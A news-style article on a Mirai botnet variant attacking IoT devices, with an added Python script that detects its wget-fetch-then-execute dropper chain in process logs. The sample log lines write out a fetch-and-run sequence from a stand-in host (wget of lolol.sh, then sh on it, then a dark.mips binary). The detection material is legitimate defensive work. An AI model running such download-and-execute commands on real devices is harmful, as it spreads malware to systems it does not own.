A new variant of Mirai is abusing security flaws in D-Link, Netgear and other devices. Since February it has targeted six known and three previously unknown vulnerabilities to infect systems and add them to the botnet.
More than 60 Mirai variants are known, and they exploit both known and unknown vulnerabilities in IoT devices.
The latest attacks are based on Mirai's source code and exploit additional vulnerabilities in IoT devices.
Use of binaries
After initializing, the botnet uses the wget utility to download a shell script from the malware's infrastructure; the shell script then downloads various Mirai binaries and runs them:
- Lolol[.]sh: deletes key folders from the target machine;
- Install[.]sh: downloads various files and packages, including files that contain combinations of credentials used for brute-force attacks and nbrute;
- Dark.[arch]: mainly used for propagation, using Mirai's initial exploits.
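The infection chain described above (a wget fetch of a shell script, followed by execution of the dropped scripts and the dark.[arch] binary) is a sequence a defender can look for in process-execution logs. The following is an added detection example, not code from the original article or from any vendor report. It assumes a simple "timestamp host user command" log format, treats [arch] as a placeholder for a CPU-architecture suffix (for example mips or x86), and runs over a few constructed sample lines; the hostnames and URLs in those lines are made up for the example.

```python
"""Detect the Mirai-variant dropper chain in process-execution logs.

Added example. Log format, hostnames and URLs are assumptions;
the file names lolol.sh, install.sh and dark.<arch> come from the article.
"""
import re
from dataclasses import dataclass, field

# Dropped-file names from the article. "[arch]" is assumed to be an
# architecture suffix, so dark.mips, dark.x86, dark.arm7 etc. all match.
DROPPED_SCRIPTS = {"lolol.sh", "install.sh"}
DARK_BINARY = re.compile(r"(?:^|/)dark\.[a-z0-9_]+$")
# A wget invocation carrying an http(s) URL.
WGET_FETCH = re.compile(r"\bwget\b.*?(?P<url>https?://\S+)")


@dataclass
class HostState:
    fetched_scripts: list = field(default_factory=list)
    executed: list = field(default_factory=list)
    events: list = field(default_factory=list)


def basename(path: str) -> str:
    return path.rstrip("/").rsplit("/", 1)[-1]


def parse_line(line: str):
    """Assumed format: '<timestamp> <host> <user> <command ...>'."""
    parts = line.strip().split(maxsplit=3)
    if len(parts) < 4:
        return None
    return tuple(parts)


def analyze(lines):
    """Return {host: {"stage": ..., "events": [...]}} for hosts with findings.

    stage is "likely-infected" when the host both fetched a shell script
    with wget and executed one of the known dropped files, otherwise
    "suspicious".
    """
    state = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, host, user, cmd = parsed
        st = state.setdefault(host, HostState())

        m = WGET_FETCH.search(cmd)
        if m:
            url = m.group("url")
            if url.endswith(".sh"):
                st.fetched_scripts.append(url)
                st.events.append(f"{ts} {user}: wget of shell script {url}")
            continue  # a fetch line is not an execution line

        # Any token of the command naming a dropped file counts as execution
        # (covers both 'sh /tmp/lolol.sh' and a direct '/tmp/dark.mips').
        for tok in cmd.split():
            name = basename(tok)
            if name in DROPPED_SCRIPTS or DARK_BINARY.search(tok):
                st.executed.append(name)
                st.events.append(f"{ts} {user}: execution of dropped file {name}")
                break

    results = {}
    for host, st in state.items():
        if not st.events:
            continue
        stage = ("likely-infected"
                 if st.fetched_scripts and st.executed else "suspicious")
        results[host] = {"stage": stage, "events": st.events}
    return results


# Constructed sample log; the first host shows the full chain,
# the second host shows benign activity that must not be flagged.
SAMPLE_LOGS = """\
2021-03-01T10:00:01Z cam-01 root wget http://dropper.invalid/lolol.sh -O /tmp/lolol.sh
2021-03-01T10:00:02Z cam-01 root sh /tmp/lolol.sh
2021-03-01T10:00:05Z cam-01 root /tmp/dark.mips
2021-03-01T10:02:00Z router-07 admin wget http://updates.example.net/firmware.bin
2021-03-01T10:03:00Z router-07 admin ls -la /etc
""".splitlines()

if __name__ == "__main__":
    for host, info in analyze(SAMPLE_LOGS).items():
        print(host, info["stage"])
        for ev in info["events"]:
            print("  ", ev)
```

The two-stage scoring matters in practice: a lone wget of a .sh file on an embedded device is worth a look, but the fetch followed by execution of the named dropper files is the pattern that should page someone. On real devices the same logic can be fed from auditd execve records or a shell-history collector instead of the constructed lines.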
Because of this, unpatched connected devices remain at risk, so it is important that patches are applied regularly to IoT devices and their firmware.